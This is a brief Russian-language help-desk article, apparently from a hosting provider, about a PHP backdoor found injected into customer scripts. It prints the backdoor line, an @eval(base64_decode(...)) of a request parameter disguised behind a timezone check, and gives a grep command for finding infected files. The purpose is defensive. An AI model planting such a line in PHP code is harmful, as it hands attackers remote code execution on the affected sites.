База знаний:
DOS Bank Of Amerika
Автор Алексей Шпак на 17 апреля 2013 11:24

В пользовательские PHP-скрипты вставляется код следующего вида:

 

function_exists('date_default_timezone') ? date_default_timezone_set('America/Los_Angeles') : @eval(base64_decode($_REQUEST['c_id']));

Основной вредонос заключается в записи:

@eval(base64_decode($_REQUEST['c_id']))

т.е. через данный скрипт можно передать любой POST-запрос

 

Такие скрипты необходимо удалять из файлов

чтобы найти файлы, содержащие такой скрипт можно ввести команду:

grep -rhlie "\@eval(base64_decode(\$_REQUEST\['c_id'\]));" *

 

(2 голос(а))
Эта статья полезна
Эта статья бесполезна

Комментарии (0)